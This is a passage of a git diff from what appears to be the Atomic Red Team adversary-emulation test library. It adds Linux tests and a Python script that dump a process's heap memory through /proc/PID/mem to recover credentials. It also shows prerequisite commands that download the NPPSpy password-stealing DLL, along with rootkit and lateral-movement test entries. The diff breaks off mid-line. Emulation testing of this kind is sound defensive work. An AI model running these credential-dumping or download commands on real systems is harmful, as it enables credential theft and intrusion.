+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Dump individual process memory with Python (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+PYTHON=$(which python || which python3 || which python2)
+$PYTHON #{python_script} $PID #{output_file}
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+(which python || which python3 || which python2)
+```
+##### Get Prereq Commands:
+```sh
+echo "Python 2.7+ or 3.4+ must be installed"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
new file mode 100644
index 00000000..fbadc564
--- /dev/null
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -0,0 +1,106 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory with sh (Local)
+  auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+    copy process memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+      MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+      MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+      MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
+
+- name: Dump individual process memory with Python (Local)
+  auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+    copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    python_script:
+      description: Path to script generating the target process
+      type: Path
+      default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+    - description: |
+        Requires Python
+      prereq_command: |
+        (which python || which python3 || which python2)
+      get_prereq_command: |
+        echo "Python 2.7+ or 3.4+ must be installed"
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      PYTHON=$(which python || which python3 || which python2)
+      $PYTHON #{python_script} $PID #{output_file}
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
diff --git a/atomics/T1003.007/src/dump_heap.py b/atomics/T1003.007/src/dump_heap.py
new file mode 100644
index 00000000..34d479c7
--- /dev/null
+++ b/atomics/T1003.007/src/dump_heap.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+    python dump_proc.py <PID> <filepath>
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+    # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0    [heap]
+    heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+    heap_range = heap_line.split(' ')[0]
+    mem_start = int(heap_range.split('-')[0], 16)
+    mem_stop = int(heap_range.split('-')[1], 16)
+    mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+    mem_file.seek(mem_start, 0)
+    heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+    ofile.write(heap_mem)
diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md
index 52491f16..496d6d4c 100644
--- a/atomics/T1003.008/T1003.008.md
+++ b/atomics/T1003.008/T1003.008.md
@@ -20,10 +20,14 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
 
@@ -54,10 +58,14 @@ rm -f #{output_file}
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
 
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index f716aaf5..f7c73c92 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -27,10 +27,14 @@ If you see a message saying "The system cannot find the path specified", try usi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
 | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
@@ -51,7 +55,7 @@ If you see a message saying "The system cannot find the path specified", try usi
 ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -78,6 +82,10 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
+
+
+
 
 
 
@@ -114,10 +122,11 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
 ##### Description: NPPSpy.dll must be available in local temp directory
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} 
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
 ```
 
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 911859c6..d622c125 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -61,6 +61,7 @@ atomic_tests:
   - description: NPPSpy.dll must be available in local temp directory 
     prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
   executor:
     command: |-
diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md
index 5a6e5d8d..19a34276 100644
--- a/atomics/T1006/T1006.md
+++ b/atomics/T1006/T1006.md
@@ -25,10 +25,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | volume | Drive letter of the volume to access | string | C:|
 
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
index d08caf66..faff45d6 100644
--- a/atomics/T1007/T1007.md
+++ b/atomics/T1007/T1007.md
@@ -19,6 +19,10 @@ Upon successful execution, cmd.exe will execute service commands with expected r
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
+
+
+
 
 
 
@@ -47,10 +51,14 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to hold net.exe output | Path | C:&#92;Windows&#92;Temp&#92;service-list.txt|
 
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md
index c8263dd5..8655b46f 100644
--- a/atomics/T1010/T1010.md
+++ b/atomics/T1010/T1010.md
@@ -17,10 +17,14 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
 | output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
@@ -45,7 +49,7 @@ del /f /q /s #{output_file_name} >nul 2>&1
 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_source_code}) {exit 0} else {exit 1} 
+if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md
index 58233009..272ee9ac 100644
--- a/atomics/T1012/T1012.md
+++ b/atomics/T1012/T1012.md
@@ -23,6 +23,10 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+
+
+
 
 
 
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index e9f81566..43f2a795 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -21,10 +21,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -50,7 +54,7 @@ sudo rmmod #{rootkit_name}
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; 
+if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -73,10 +77,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -104,7 +112,7 @@ sudo depmod -a
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; 
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -136,10 +144,14 @@ This will simulate hiding a process.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | driver_path | Path to a vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
 | puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder&#92;T1014&#92;bin&#92;puppetstrings.exe|
@@ -159,7 +171,7 @@ This will simulate hiding a process.
 ##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} 
+if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 4ddc6913..35bd3edd 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -33,6 +33,10 @@ Upon successful execution, cmd.exe will spawn multiple commands to list network
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
+
+
+
 
 
 
@@ -63,6 +67,10 @@ Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
+
+
+
 
 
 
@@ -89,6 +97,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
+
+
+
 
 
 
@@ -118,6 +130,10 @@ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config works
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
+
+
+
 
 
 
@@ -148,10 +164,14 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
 | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
@@ -201,7 +221,7 @@ Remove-Item -ErrorAction ignore "#{output_file}"
 ##### Description: Test requires #{port_file} to exist
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{port_file}") {exit 0} else {exit 1} 
+if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -222,10 +242,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -244,7 +268,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -263,10 +287,14 @@ A list of commands known to be performed by Qakbot for recon purposes
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
 
@@ -296,6 +324,10 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+
+
+
 
 
 
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index eff14164..5d28a39a 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -39,6 +39,10 @@ Upon successful execution, cmd.exe will execute `net.exe view` and display resul
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
+
+
+
 
 
 
@@ -66,6 +70,10 @@ Upon successful execution, cmd.exe will execute cmd.exe against Active Directory
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
+
+
+
 
 
 
@@ -92,10 +100,14 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_domain | Domain to query for domain controllers | String | domain.local|
 
@@ -123,6 +135,10 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
+
+
+
 
 
 
@@ -149,6 +165,10 @@ Upon successful execution, cmd.exe will execute arp to list out the arp cache. O
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
+
+
+
 
 
 
@@ -175,6 +195,10 @@ Upon successful execution, sh will execute arp to list out the arp cache. Output
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
+
+
+
 
 
 
@@ -192,7 +216,7 @@ arp -a | grep -v '^?'
 ##### Description: Check if arp command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -213,10 +237,14 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | start_host | Subnet used for ping sweep. | string | 1|
 | stop_host | Subnet used for ping sweep. | string | 254|
@@ -246,6 +274,10 @@ Upon successful execution, powershell will identify the ip range (via ipconfig)
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
+
+
+
 
 
 
@@ -277,10 +309,14 @@ Successful execution of this test will list dns zones in the terminal.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username including domain. | string | domain&#92;user|
 | acct_pass | Account password. | string | password|
@@ -301,7 +337,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -310,7 +346,7 @@ echo "Python 3 must be installed manually"
 ##### Description: Computer must have pip installed
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1} 
+if (pip3 -V) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -319,7 +355,7 @@ echo "PIP must be installed manually"
 ##### Description: adidnsdump must be installed and part of PATH
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1} 
+if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -339,10 +375,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -361,7 +401,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -381,10 +421,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -403,7 +447,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md
index 697f4045..3c62c9dd 100644
--- a/atomics/T1020/T1020.md
+++ b/atomics/T1020/T1020.md
@@ -19,10 +19,14 @@ Deletes a created file
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
 | domain | Destination Domain | url | https://google.com|
diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md
index d9bb0d80..1d647cd1 100644
--- a/atomics/T1021.001/T1021.001.md
+++ b/atomics/T1021.001/T1021.001.md
@@ -21,10 +21,14 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
 | domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
@@ -56,7 +60,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
 ##### Description: Computer must be domain joined
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -75,10 +79,14 @@ Attempt an RDP session via Remote Desktop Application over Powershell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName | String | WIN-DC|
 | username | Username | String | Administrator|
diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md
index 001dd7b8..6cfb82c9 100644
--- a/atomics/T1021.002/T1021.002.md
+++ b/atomics/T1021.002/T1021.002.md
@@ -25,10 +25,14 @@ Connecting To Remote Shares
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | String | DOMAIN&#92;Administrator|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -57,10 +61,14 @@ Map Admin share utilizing PowerShell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
 | map_name | Mapped Drive Letter | String | g|
@@ -88,10 +96,14 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_path | File to copy and execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | remote_host | Remote computer to receive the copy and execute the file | String | &#92;&#92;localhost|
@@ -112,7 +124,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
